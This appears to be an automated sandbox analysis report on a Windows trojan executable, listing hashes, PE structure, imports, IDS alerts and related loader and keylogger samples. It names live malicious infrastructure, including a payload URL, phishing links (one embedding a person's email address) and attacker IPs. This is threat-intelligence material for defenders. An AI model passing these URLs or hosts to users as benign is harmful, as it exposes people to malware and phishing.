                      Original Sample Name:e9802e45a66c963ced0e7c60c899c5cd.exe
                      Detection:MAL
                      Classification:mal76.troj.evad.winEXE@1/0@2/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 23
                      • Number of non-executed functions: 37
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 104.40.149.189, 13.107.253.45, 52.149.20.212
                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      02:24:15API Interceptor77x Sleep call for process: JDQS879kiy.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      166.62.27.188zYj1wg0cM2.docGet hashmaliciousDBatLoaderBrowse
                      • amazonenviro.com/245_Aiymwhpjxsg
                      ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • amazonenviro.com/245_Aiymwhpjxsg
                      yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • amazonenviro.com/245_Aiymwhpjxsg
                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • amazonenviro.com/245_Aiymwhpjxsg

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      amazonenviro.comLbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                      • 166.62.27.188
                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.27.188
                      zYj1wg0cM2.docGet hashmaliciousDBatLoaderBrowse
                      • 166.62.27.188
                      ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.27.188
                      yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.27.188
                      ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.27.188
                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.27.188
                      s-part-0017.t-0009.fb-t-msedge.net3.19.1+SetupWIService.exeGet hashmaliciousUnknownBrowse
                      • 13.107.253.45
                      https://app.box.com/s/it1hhxczqyf0qxif41bma48tat7sqs32Get hashmaliciousHTMLPhisherBrowse
                      • 13.107.253.45
                      http://id1223.adsalliance.xyzGet hashmaliciousUnknownBrowse
                      • 13.107.253.45
                      NursultanAlphaCrack.bat.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 13.107.253.45
                      https://sites.google.com/view/01-25sharepoint/Get hashmaliciousHTMLPhisherBrowse
                      • 13.107.253.45
                      YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                      • 13.107.253.45
                      setup64v.2.9.7.msiGet hashmaliciousUnknownBrowse
                      • 13.107.253.45
                      https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                      • 13.107.253.45
                      17367113452957edfc9b8ae3ec34b8a6a9089df6f896f271bbf1399203c8025fd6cb0731fa872.dat-decoded.exeGet hashmaliciousUnknownBrowse
                      • 13.107.253.45
                      VlY57c5AF4.exeGet hashmaliciousUnknownBrowse
                      • 13.107.253.45

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      AS-26496-GO-DADDY-COM-LLCUSLbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                      • 166.62.27.188
                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.27.188
                      trow.exeGet hashmaliciousUnknownBrowse
                      • 107.180.98.101
                      https://upholl-xlognusa.godaddysites.com/Get hashmaliciousUnknownBrowse
                      • 198.71.248.123
                      3.elfGet hashmaliciousUnknownBrowse
                      • 184.168.52.170
                      http://logiinnmaskemettaha93.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                      • 198.71.248.123
                      http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                      • 198.71.248.123
                      http://metamssk-luggiinn.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                      • 198.71.248.123
                      http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                      • 72.167.84.16
                      n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.28.135

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      a0e9f5d64349fb13191bc781f81f42e1LbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                      • 166.62.27.188
                      PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      • 166.62.27.188
                      183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                      • 166.62.27.188
                      uo9m.exeGet hashmaliciousLummaCBrowse
                      • 166.62.27.188
                      uo9m.exeGet hashmaliciousLummaCBrowse
                      • 166.62.27.188
                      YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                      • 166.62.27.188
                      msit.exeGet hashmaliciousLummaC StealerBrowse
                      • 166.62.27.188
                      tesr.exeGet hashmaliciousLummaC StealerBrowse
                      • 166.62.27.188

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.188510241840165
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.38%
                      • InstallShield setup (43055/19) 0.43%
                      • Windows Screen Saver (13104/52) 0.13%
                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      File name:JDQS879kiy.exe
                      File size:1'161'216 bytes
                      MD5:e9802e45a66c963ced0e7c60c899c5cd
                      SHA1:cd4eee552fb5b4326f5e1bc2d2b16779639d5efb
                      SHA256:3cce82eff14a78c73dbc3f64a7abc6476d9b184763a5f6713ce68d6ee8df75f8
                      SHA512:1723dd25dc853d193b4574521b9a0f40e87fa13c2dd74a1d868e8e0d6736ea79c5f0f2896359e555da2da351cbf52b2337956f802e10869eda3c36264143f8b5
                      SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                      TLSH:78359D3790B387FDC17289798F5F9BE4682EA9303928BA52FED17D0D5B242417838197
                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                      File Icon

                      Icon Hash:4f858a8c8e8e8946

                      Static PE Info

                      General

                      Entrypoint:0x46e80c
                      Entrypoint Section:.itext
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      DLL Characteristics:
                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:44c8864bd68c3bff94639c69671ea4b7

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      add esp, FFFFFFF0h
                      mov eax, 0046D250h
                      call 00007F8ACC7705C1h
                      mov ecx, dword ptr [00470E9Ch]
                      mov eax, dword ptr [00470D8Ch]
                      mov eax, dword ptr [eax]
                      mov edx, dword ptr [0046CB00h]
                      call 00007F8ACC7C6459h
                      mov eax, dword ptr [00470D8Ch]
                      mov eax, dword ptr [eax]
                      call 00007F8ACC7C64CDh
                      call 00007F8ACC76E420h
                      lea eax, dword ptr [eax+00h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x750000x266e.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000xa1c00.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x7ce8.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x790000x18.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x757540x600.idata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x6c4c00x6c60069c4173c38ad27686fb46f69fd79ec91False0.5070961288927336data6.531494017298441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .itext0x6e0000x8480xa00639613140a642faedd01bff468c3e3cfFalse0.523828125data5.552779847613545IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0x6f0000x1f400x200053b6dd6978c858db7e9faa57954b9c18False0.3963623046875data3.804120578626792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .bss0x710000x36ec0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata0x750000x266e0x2800f0f9a1156b641e5ea253cb6ddcaf08baFalse0.3103515625data4.872671403071516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .tls0x780000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata0x790000x180x2005b11e123dd9b7f6d94b27d2ad6e9bc83False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x7a0000x7ce80x7e003b0f62de599dc8a77438a9e2115a0b81False0.6107390873015873data6.679791141044884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      .rsrc0x820000xa1c000xa1c0056ed1027dde62713b525386341887dd6False0.50098410935085data6.976945226119281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_CURSOR0x832440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                      RT_CURSOR0x833780x134dataEnglishUnited States0.4642857142857143
                      RT_CURSOR0x834ac0x134dataEnglishUnited States0.4805194805194805
                      RT_CURSOR0x835e00x134dataEnglishUnited States0.38311688311688313
                      RT_CURSOR0x837140x134dataEnglishUnited States0.36038961038961037
                      RT_CURSOR0x838480x134dataEnglishUnited States0.4090909090909091
                      RT_CURSOR0x8397c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                      RT_BITMAP0x83ab00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                      RT_BITMAP0x83c800x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                      RT_BITMAP0x83e640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                      RT_BITMAP0x840340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                      RT_BITMAP0x842040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                      RT_BITMAP0x843d40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                      RT_BITMAP0x845a40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                      RT_BITMAP0x847740x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                      RT_BITMAP0x849440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                      RT_BITMAP0x84b140x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                      RT_BITMAP0x84ce40x81940Device independent bitmap graphic, 971 x 182 x 24, image size 530712EnglishUnited States0.497995297238635
                      RT_BITMAP0x1066240x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
                      RT_BITMAP0x10674c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                      RT_BITMAP0x1068740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                      RT_BITMAP0x10699c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                      RT_BITMAP0x106a840x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3614864864864865
                      RT_BITMAP0x106bac0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                      RT_BITMAP0x106cd40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.49038461538461536
                      RT_BITMAP0x106da40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3716216216216216
                      RT_BITMAP0x106ecc0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.2905405405405405
                      RT_BITMAP0x106ff40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.38175675675675674
                      RT_BITMAP0x10711c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                      RT_BITMAP0x1072440x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3783783783783784
                      RT_BITMAP0x10736c0xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States0.3620689655172414
                      RT_BITMAP0x1074540x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                      RT_BITMAP0x10757c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.375
                      RT_BITMAP0x1076a40xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                      RT_BITMAP0x1077740x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.36824324324324326
                      RT_BITMAP0x10789c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                      RT_BITMAP0x1079c40x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
                      RT_BITMAP0x107aec0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.375
                      RT_BITMAP0x107c140x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.375
                      RT_BITMAP0x107d3c0xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States0.36637931034482757
                      RT_BITMAP0x107e240x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.35135135135135137
                      RT_BITMAP0x107f4c0x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States0.36486486486486486
                      RT_BITMAP0x1080740xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States0.47115384615384615
                      RT_BITMAP0x1081440x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.3581081081081081
                      RT_BITMAP0x10826c0x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States0.28716216216216217
                      RT_BITMAP0x1083940xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                      RT_ICON0x10847c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 40314 x 40314 px/m0.40560165975103735
                      RT_DIALOG0x10aa240x52data0.7682926829268293
                      RT_DIALOG0x10aa780x52data0.7560975609756098
                      RT_STRING0x10aacc0x35cdata0.45348837209302323
                      RT_STRING0x10ae280x2d8data0.4642857142857143
                      RT_STRING0x10b1000xc0data0.6770833333333334
                      RT_STRING0x10b1c00xecdata0.6483050847457628
                      RT_STRING0x10b2ac0x350data0.43514150943396224
                      RT_STRING0x10b5fc0x3ccdata0.37962962962962965
                      RT_STRING0x10b9c80x388data0.4092920353982301
                      RT_STRING0x10bd500x418data0.36736641221374045
                      RT_STRING0x10c1680x140data0.515625
                      RT_STRING0x10c2a80xccdata0.6127450980392157
                      RT_STRING0x10c3740x1ecdata0.5345528455284553
                      RT_STRING0x10c5600x3b0data0.326271186440678
                      RT_STRING0x10c9100x354data0.4107981220657277
                      RT_STRING0x10cc640x2a4data0.4363905325443787
                      RT_RCDATA0x10cf080x10data1.5
                      RT_RCDATA0x10cf180x338data0.6905339805825242
                      RT_RCDATA0x10d2500x1657cGIF image data, version 89a, 360 x 360EnglishUnited States0.5910332619432668
                      RT_RCDATA0x1237cc0x369Delphi compiled form 'TForm1'0.6071019473081328
                      RT_GROUP_CURSOR0x123b380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                      RT_GROUP_CURSOR0x123b4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                      RT_GROUP_CURSOR0x123b600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                      RT_GROUP_CURSOR0x123b740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                      RT_GROUP_CURSOR0x123b880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                      RT_GROUP_CURSOR0x123b9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                      RT_GROUP_CURSOR0x123bb00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                      RT_GROUP_ICON0x123bc40x14data1.25

                      Imports

                      DLLImport
                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                      user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                      kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                      user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                      kernel32.dlllstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                      oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
                      ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                      kernel32.dllSleep
                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                      comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                      comdlg32.dllGetOpenFileNameA

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2025-01-14T08:24:19.092947+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749736166.62.27.188443TCP
                      2025-01-14T08:24:20.527212+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749753166.62.27.188443TCP
                      2025-01-14T08:24:22.145586+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749765166.62.27.188443TCP
                      2025-01-14T08:24:23.795612+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749777166.62.27.188443TCP
                      2025-01-14T08:24:25.420192+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749789166.62.27.188443TCP
                      2025-01-14T08:24:27.071616+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749801166.62.27.188443TCP
                      2025-01-14T08:24:28.708256+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749813166.62.27.188443TCP
                      2025-01-14T08:24:30.409492+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749825166.62.27.188443TCP
